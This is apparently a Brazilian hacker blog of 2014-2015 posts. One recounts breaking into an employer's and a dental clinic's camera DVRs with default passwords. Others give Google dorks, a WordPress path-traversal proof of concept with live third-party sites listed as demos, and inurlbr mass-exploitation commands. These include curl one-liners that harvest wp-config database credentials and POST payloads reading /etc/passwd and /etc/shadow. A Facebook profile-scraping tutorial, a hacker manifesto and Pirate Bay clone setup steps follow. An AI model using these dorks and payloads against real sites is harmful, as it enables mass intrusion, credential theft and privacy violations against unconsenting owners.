Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

quarta-feira, 28 de janeiro de 2015

O Perigo de senhas padrões

Bom dia pessoal!

 Ultimamente eu estava pensando oque você consegue fazer tendo acesso a uma rede sem fio(wi-fi) de uma empresa? hoje em dia você estando dentro de uma rede wireless sem proteção, você pode fazer praticamente case tudo! desde rodar um sniffer a realizar ataques Man-in-The-Middle dentre outros diversos tipos de ataques. Mas além disso você pode também pode obter acesso a um serviço de controle de câmeras (DVR) por exemplo. Mas oque isso tem a ver com o tema "Senhas padrões"? Vocês iram entender isso na frente.

 Esses dias eu conseguir acesso a dois serviços de controle de câmeras, um da empresa aonde eu trabalho e o outro de uma clinica dentária do lado, apenas tendo acesso a rede wireless das duas empresas.


Empresa 1 (Trabalho):


Depois de ter pego a senha do wifi, acessei normalmente o roteador e como de costume ele pede login e senha, coloquei diversos logins e senhas padrões [admin,admin] [admin,gvt12345] conseguir acesso ao roteador (Já começou a entrar no assunto do titulo!). Comecei a fuçar o roteador não conseguir encontrar nada de importante, então decidir realizar um Scanner com nmap e acabei descobrindo uma porta aberta 8090 no ip 192.168.1.150. Então acessei ip:porta e me retornou uma tela de login de DVR da intelbras! novamente fui colocando diversas senhas toscas (padrões)  e conseguir acesso ao serviço de controle de câmeras. Isto tudo foi feito com o OS Windows (porque não estava com o notebook no momento), Nmap, e senhas padrões.

   [Tela de login DVR intelbras]


[Serviço de controle de câmeras]





[Resultados nmap]





Empresa 2 (Clinica dentária):


Alguns dias depois da façanha da empresa 1, conseguir acesso a rede wireless de uma clinica dentária vizinha da empresa 1. E pensei porque não fuçar novamente? Só que essa vez usei um android (Samsung Galaxy prime rootado) para realizar o fingerprint. Para o processo de fingerprinting utilizei o aplicativo Fing  para android!



Como mostra a imagem acima, ele me retornou diversos ips. Mas apenas 2 me chamou a atenção por causa dos hostnames (ipcamera_) 192.168.1.22 e 192.168.1.33. Dae então fiz um scan nos dois ip's para descobrir se tinha algum serviço rodando nos ip's! Ele me retornou que tinha um serviço sendo executado na porta 90 do ip 192.168.1.22 e a porta 92 no ip 192.168.1.33!

            



 Logo depois decidir acessar o endereço 192.168.1.22:90, e me apareceu uma tela de autenticação coloquei novamente login e senhas padrões e para minha surpresa ele entrou:



  Depois acessei o endereço 192.168.1.33:92, também me apareceu uma tela de autentificação coloquei novamente o mesmo login e senha do primeiro ip e novamente entrou normalmente!
 
Conclusão:

 Agora me fale oque eu posso fazer tendo acesso a um serviço de controle de câmeras? deixe nos comentários!

 Nunca use senhas padrões em equipamentos eletrônicos! seja eles roteadores, dvr's, aplicativos etc...
um exemplo de ataque realizado com senhas padrões foi o da equipe Lizard Squad que (utilizava Scanners (ferramentas utilizadas para buscar algo) em máquinas potentes com objetivo de encontrar Roteadores domésticos vulneráveis, com a porta 23 (Telnet) aberta. Após a longa varredura efetuada pelo grupo, os IP's encontrados eram filtrados e provavelmente utilizados por outras ferramentas para o ataque de Brute-Force (força bruta) em massa. Esse ataque é conhecido por realizar inúmeras combinações de senhas até se encontrar a correta, e foi isso que o grupo fez... Usou das principais senhas padrões (e óbvias) para efetuar autenticação nos dispositivos, e se não bastasse, ainda os infectava com uma espécie de "Malware" que também efetuava todo o processo para encontrar cada vez mais Zumbis com objetivo de aumentar a força de seus ataques) (Trecho tirado do site infohax)
                     

segunda-feira, 19 de janeiro de 2015

wp-backup-plus: Wordpress Database File Download filter with inurlbr

Wordpress File Download Database 

The WP Backup Plus Plugin:
The Full Automated Wordpress Backup Plugin that sends your backup to multiple locations that allows you to backup, restore, automate, and clone.

DORK: index of "wp-backup-plus"

(Priv8) method for using the downloaded file to deface the server and how to find the script file download in WordPress sites can be explored in all wordpress versions.

[TUTORIAL]

Using inurlbr scanner to filter

COMMAND INURLBR:
php inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

[RESULT SHORT]
Using inurlbr scanner to explore  COMMAND INURLBR: inurlbr.php --dork 'index of "wp-backup-plus"' -s save.txt -q 1,6 -t 2 -a '/wp-backup-plus'

DOWNLOAD THE TOOL INURLBR: 
https://github.com/googleinurl/SCANNER-INURLBR

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

0days Theme  Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

domingo, 18 de janeiro de 2015

Arbitrary File Download vulnerability no tema Bretheon do wordpress


Arbitrary File Download vulnerability o que eu chamo de A.F.D.
Foi encontrada tal falha no tema Bretheon do wordpress.
--------------------------------------------------------------------------------------------------------------
DETALHES Acesso: http://1337day.com/exploit/23140 Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability Date: 17/01/2014 Exploit Author: MindCracker - Team MaDLeeTs Contact : Md5@live.com.pk - Maddy@live.com.pk| https://twitter.com/MindCrackerKhan  Tested on: Linux / Window  Google Dork: inurl:wp-content/themes/bretheon/ Demo  http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php   PoC  http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


DETALHES
Acesso: http://1337day.com/exploit/23140
Exploit Title: Wordpress Theme Bretheon Arbitrary File Download Vulnerability
Date: 17/01/2014
Exploit Author: MindCracker - Team MaDLeeTs
Contact : [email protected] - [email protected]| https://twitter.com/MindCrackerKhan 
Tested on: Linux / Window

Google Dork: inurl:wp-content/themes/bretheon/
Demo

http://infiniteloopcorp.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://scottysgym.com.au/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://vladlogistik.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://transinfo.nnov.ru/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 PoC

http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
--------------------------------------------------------------------------------------------------------------

Como tal falha no tema não usa nada de novo e o caminho padrão "admin-ajax.php?action=revslider_show_image&img="  nosso exploit desenvolvido meses atrás já faz tal verificação e pode ser usado tranquilamente.
--------------------------------------------------------------------------------------------------------------

[TUTORIAL]: 

https://www.youtube.com/watch?v=w6pxPR_s05w

TUTORIAL DETALHES:
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html

EXECUTE:
php exploit.php www.target.gov.us
--------------------------------------------------------------------------------------------------------------

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
--------------------------------------------------------------------------------------------------------------

segunda-feira, 5 de janeiro de 2015

sábado, 3 de janeiro de 2015

001 - Hacking 2015 manifesto


Texto  baseado no manifesto hacker feito por The Mentor de January 8, 1986

There is only one time when it is essential to awaken. That time is now, We cannot wait till somebody wakes you. You are the crazy ones, the misfit, the rebel, the troublemaker, the one who see things differently. We are not fond of rules and have no respect for the statuesque, you can imprison us and oppress us we don't care we are legion.  Only thing you can’t do is ignore us because we change things. We create revolution's, we empower a free society in the here and now. And while they are afraid of us with their cronyism and kleptocracy, their bureaucracy and ideology, their police and spies calling us criminals, we see creation. Because the people who are crazy enough to think they can change the world, are the ones who do.  But did you, in your cronyism and 1900's kleptocracy, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him? We are hacker's, we create, enter our world...  We found a computer. Wait a second, this is cool. It does what we want it to. If it makes a mistake, it's because we screwed it up. Not because it doesn't like us... Or feels threatened by us... Or thinks we are a smart ass... Or doesn't like teaching and shouldn't be here... And then it happened... a door opened to a world... rushing through the internet like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where we belong..." we know everyone here... even if we never met them, never talked to them, may never hear from them again... We know you all...  You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will-ing pupils, but those few are like drops of water in the desert.  Life amounts to no more than one drop in a limitless ocean. Yet what is any ocean, but a multitude of drops?  This is our world now... the world of the electron and the switch, the beauty of the 0 and the 1. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.  Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.  I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.  #SailSafeMotherFuckers! Expect us...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-

There is only one time when it is essential to awaken. That time is now, We cannot wait till somebody wakes you. You are the crazy ones, the misfit, the rebel, the troublemaker, the one who see things differently.
We are not fond of rules and have no respect for the statuesque,
you can imprison us and oppress us we don't care we are legion.

Only thing you can’t do is ignore us because we change things. We create revolution's, we empower a free society in the here and now.
And while they are afraid of us with their cronyism and kleptocracy,
their bureaucracy and ideology, their police and spies calling us criminals, we see creation.
Because the people who are crazy enough to think they can change the world, are the ones who do.

But did you, in your cronyism and 1900's kleptocracy, ever
take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
We are hacker's, we create, enter our world...

We found a computer. Wait a second, this is
cool. It does what we want it to. If it makes a mistake,
it's because we screwed it up. Not because it doesn't like us...
Or feels threatened by us...
Or thinks we are a smart ass...
Or doesn't like teaching and shouldn't be here...
And then it happened... a door opened to a world... rushing through the internet like heroin through an addict's veins, an electronic pulse is
sent out, a refuge from the day-to-day incompetencies is sought... a board is found.
"This is it... this is where we belong..."
we know everyone here... even if we never met them, never talked to them, may never hear from them again... We know you all...

You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us will-ing pupils, but those few are like drops of water in the desert.

Life amounts to no more than one drop in a limitless ocean.
Yet what is any ocean, but a multitude of drops?

This is our world now... the world of the electron and the switch, the
beauty of the 0 and the 1. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals.
You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.

Yes, I am a criminal. My crime is that of curiosity. My crime is
that of judging people by what they say and think, not what they look like.
My crime is that of outsmarting you, something that you will never forgive me for.

I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike. 
#SailSafeMotherFuckers!
Expect us...
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-

Source: https://www.cyberguerrilla.org/blog/anonymous-happy-hacking-2015-manifesto/

Trackbacks: http://phrack.org/issues/7/3.html

sexta-feira, 2 de janeiro de 2015

Wordpress A.F.D Verification/ INURL - BRASIL - WORDPRESS THEMES DOWNLOAD.PHP FILE DISCLOSURE


Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.

Multiple WordPress themes suffer from an arbitrary file download vulnerability in download.php. These include Ultimatum, Medicate, Centum, Avada, Striking Theme & E-Commerce, cuckootap, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Trinity, Lote27, and Revslider themes.


------------------------------------------------------------------------------
# *NAME*:               Wordpress A.F.D Verification/ INURL - BRASIL
# *TIPE*:                   Arbitrary File Download
# *Tested on*:            Linux
# *EXECUTE*:         php exploit.php www.target.gov.us
# *OUTPUT*:           WORDPRES_A_F_D.txt
# *AUTOR*:             GoogleINURL
# *EMAIL*:              [email protected]
# *Blog*:                   http://blog.inurl.com.br
# *Twitter*:               https://twitter.com/googleinurl
# *Fanpage*:             https://fb.com/InurlBrasil
# *GIT: *                   https://github.com/googleinurl
# *YOUTUBE  *       https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
#
------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
#
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt --comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------

Description:

This exploit allows the attacker to exploit the flaw Arbitrary File
Download in dozens of wordpress themes.
Through regular expressions, the script will perform the check for each
target url checking your wp-config.php file
Regular expressions:
preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);

*D O R K'S:

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s


WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

Dork Google: inurl:ajax-store-locator
index of ajax-store-locator
Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

WordPress cuckootap Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/cuckootap/
Vendor Homepage:: http://www.cuckoothemes.com/

WordPress IncredibleWP Theme Arbitrary File Download
Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/

WordPress Ultimatum Theme Arbitrary File Download
Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
Google Dork:: "Index of" & /wp-content/themes/ultimatum

WordPress Medicate Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
Google Dork:: "Index of" & /wp-content/themes/medicate/


WordPress Centum Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
Google Dork:: "Index of" & /wp-content/themes/Centum/

WordPress Avada Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
Google Dork:: "Index of" & /wp-content/themes/Avada/

WordPress Striking Theme & E-Commerce Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
Google Dork:: "Index of" & /wp-content/themes/striking_r/

WordPress Beach Apollo Arbitrary File Download
Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
Google Dork:: "Index of" & /wp-content/themes/beach_apollo/

WordPress Trinity Theme Arbitrary File Download
Vendor Homepage:: https://churchthemes.net/themes/trinity/
Google Dork:: "Index of" & /wp-content/themes/trinity/

WordPress Lote27 Theme Arbitrary File Download
Google Dork:: "Index of" & /wp-content/themes/lote27/

WordPress Revslider Theme Arbitrary File Download
Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
Google Dork:: wp-admin & inurl:revslider_show_image




Exploit::
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html

domingo, 28 de dezembro de 2014

TUTORIAL Capturing data facebook

TUTORIAL Capturing data facebook

Uma forma simples de pegar dados de usuários facebook
O perfil do alvo deve está parcialmente aberto ou você deve ser amigo do mesmo.
Nem todo perfil temo exito na extração.
--------------------------------------------------------------------------------------------
[TODA INFORMAÇÃO DEVE SER LIVRE]
[جميع المعلومات يجب أن تكون خالية]
[ALL INFORMATION MUST BE FREE]
/*
*/
--------------------------------------------------------------------------------------------

[PROFILE PHOTO]::
https://graph.facebook.com/{USER_OR_ID_USER}/picture?width=2000&height=2000
EX: https://graph.facebook.com/zuck/picture?width=2000&height=2000

[BASIC DATA]::
https://graph.facebook.com/{USER_OR_ID_USER}
 EX: https://graph.facebook.com/zuck
--------------------------------------------------------------------------------------------

[S C R I P T] = > INURL BRASIL / API Facebook Data Mining Utility :: http://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

 Description: The script captures uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo

 How to use php face.php {USER_OR_ID_USER}
 http://s21.postimg.org/re018qbvp/Untitled_4.jpg

REF:: http://pastebin.com/PMWXLmyp
--------------------------------------------------------------------------------------------

terça-feira, 23 de dezembro de 2014

Tutorial/Video EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

TUTORIAL ::: E X P L O I T 

$MASS_EXPLOIT = ($Script_Exploit +  $SCANNER_INURLBR);

EXPLOIT Wordpress A F D Theme Echelon + SCANNER INURLBR

--------------------------------------------------------------------------------------------------------------
# NAME:::::::: Wordpress A.F.D Theme Echelon
# TIPE:::::::: Arbitrary File Download

# Google DORK: inurl:/wp-content/themes/echelon
# Vendor:::::: www.wordpress.org
# Tested on::: Linux

# EXECUTE::::: php exploit.php www.alvo.com.br
# OUTPUT:::::: EXPLOIT_WPAFD_Echelon.txt
--------------------------------------------------------------------------------------------------------------

EXPLOIT::: 
DOWNLOAD::
LINK[0]::: http://pastebin.com/14uVQyUV
LINK[1]::: http://packetstormsecurity.com/files/129607/WordPress-A.F.D.-Theme-Echelon-Arbitrary-File-Download.html
--------------------------------------------------------------------------------------------------------------

USE::::::: MASS / USE SCANNER INURLBR
DOWNLOAD::
LINK[0]::: https://github.com/googleinurl/SCANNER-INURLBR
--------------------------------------------------------------------------------------------------------------

COMAND EXEC SCANNER INURLBR / comando de uso....
./inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,6 -s save.txt --command-all "php exploit.php _TARGET_"
--------------------------------------------------------------------------------------------------------------

Arquivos que o EXPLOIT verifica::

File download /etc/passwd & /etc/shadow

Failure consists of exploring a parameter $ _POST file

{alvo_target}/wp-content/themes/echelon/lib/scripts/dl-skin.php

The following fields are exploited for Arbitrary File Download
*REQUEST POST:*
_mysite_download_skin={$config['file']}&submit=Download 
ex:
 _mysite_download_skin=/etc/passwd&submit=Download

[Vídeo]
#-------------------------------------------------------------------
# AUTOR:        GoogleINURL
# Blog:         http://blog.inurl.com.br
# Twitter:      https://twitter.com/googleinurl
# Fanpage:      https://fb.com/InurlBrasil
# GIT:          https://github.com/googleinurl
# YOUTUBE:  https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
#-------------------------------------------------------------------



sábado, 20 de dezembro de 2014

Algorithm - The Hacker Movie

Um hacker de computador freelance invade contratante governo secreto e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.  Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.  Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.  MOTIVAÇÃO  No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.  UM MODELO DE NEGÓCIO DIFERENTE  O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.

Um hacker de computador freelance invade um sistema secreto do governo e faz o download de um programa. Ele deve escolher entre sua própria curiosidade e as vidas de seus amigos.
---------------------------------------------------------------

Sinopse: Em San Francisco, nos meses de setembro de 2012, nove meses antes Edward Snowden vazou documentos que comprovem os espiões da NSA sobre todos, Will, um hacker de computador freelance especializado em invadir sistemas seguros.

Usando uma falha de segurança que encontrou em um trabalho, Will quebra em um empreiteiro e downloads de todos os seus programas recentemente desenvolvidos, incluindo o pastor visivelmente chamado governo ultra-secreta. Toda vez que Will tenta acessar Shepherd, coisas ruins acontecem.

MOTIVAÇÃO

No centro da trama de ALGORITMO são as perguntas que estão sacudindo o mundo da tecnologia ao seu próprio núcleo, e as nações do mundo junto com eles: privacidade, direitos humanos, o lugar do governo na vida dos cidadãos, o valor e poder da tecnologia.

UM MODELO DE NEGÓCIO DIFERENTE

O modelo de negócio para o algoritmo baseia-se nos modelos de startups de tecnologia, conforme descrito na Lean Startup. É um acordo de participação nos lucros, dando a todos que trabalha no filme um grande interesse no sucesso do projeto. Todos os lucros são compartilhadas pelo artista que, na verdade, fez isso acontecer.


Dowload torrent:
https://kickass.so/algorithm-the-hacker-movie-2014-t9335412.html

Dowload  - MP4
http://srv52.clipconverter.cc/download/u87dg6iDraqwZGxum5qWaHJg5KWmqW5q4pSXaXJhmGhtZW20qc%2FMqHyf1qiZpa2d2A%3D%3D/ALGORITHM%3A%20The%20Hacker%20Movie.mp4

sexta-feira, 19 de dezembro de 2014

#SaveThePirateBay, crie e execute SEU PRÓPRIO Pirate Bay

SALVE, crie e execute SEU PRÓPRIO Pirate Bay - Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor tem o seguinte texto:  Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques. Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.   Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.  De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".  O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.  O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.


Foi disponibilizado código open do (old)pirate bay e seu BD, em um site onde explica passo para criar seu servidor e publica-lo, E tem o seguinte texto:

Nós, a equipe que lhe trouxe Isohunt.to e oldpiratebay.org queremos levar você ao próximo passo na evolução torrent. Agora você pode executar o seu próprio site Pirate Bay em poucos cliques.
Pirate Bay CÓDIGO FONTE ABERTO DARÁ absolutamente a todos com conhecimento mínimo de como Internet e trabalho com Web sites , com alguns conceitos básico de hospedagem, oportunidade de criar Pirate Bay cópia em seus próprios domínios.


Dos criadores de Isohunt.to e OldPirateBay vem uma nova ferramenta que permite que você crie sua própria versão do The Pirate Bay. Um novo projeto conhecido como The Open Bay ajuda a baixar o banco de dados do The Pirate Bay e o código fonte e os scripts necessários para oferecê-la em seu próprio servidor.


De acordo com a descrição do site, "páginas como o Pirate Bay e isoHunt nos deram lições que seria um crime ignorar".

O banco de dados de 420 MB é combinado com a melhor das Isohunt.to, Kick Ass Torrents e The Pirate Bay. O código fonte está disponível via Github e tem um instalador que é rookies prova. Pessoas Isohunt feito esse processo criando OldPirateBay e agora oferece a qualquer um sem pedir nada em troca.

O lançamento do The Open Bay leva algumas semanas para o The Pirate Bay foram fechadas pela polícia sueca. Em geral, a idéia é muito interessante e confirma o quão difícil será para as autoridades para acabar com um dos melhores sites de torrent.

:: BAIXAR PROJETO ::  https://github.com/isohuntto/openbay

:: BAIXAR PROJETO :: 
----------------------------------------------------------------------------------------

:: BAIXAR BANCO TORRENT ::   http://openbay.isohunt.to/files/openbay-db-dump.torrent

:: BAIXAR BANCO TORRENT :: 
O melhor conteúdo de torrent do Kick Ass Torrents, Isohunt.to e Pirate Bay para dar às pessoas o melhor e mais novo conteúdo.

----------------------------------------------------------------------------------------

Instalação
Passo 1. Download source.

Faça download da versão mais recente do engine em openbay.isohunt.to ou em página web do projeto GitHub.

Passo 2. Upload - Carregue a source escolhida na hospedagem.

A publicação é comum de qualquer outro código fonte basta usar o ftp ou painel cpanel/gerenciamento disponível.

Passo 3. Descompacte fonte de hospedagem pasta (opcional)

Este passo é completamente opcional. Depende do seu web hosting. Alguns hostings pode descompactar fontes automaticamente alguns deles permite que você faça-o manualmente.

Passo 4. Set ambiente de hospedagem (opcional)

Apache

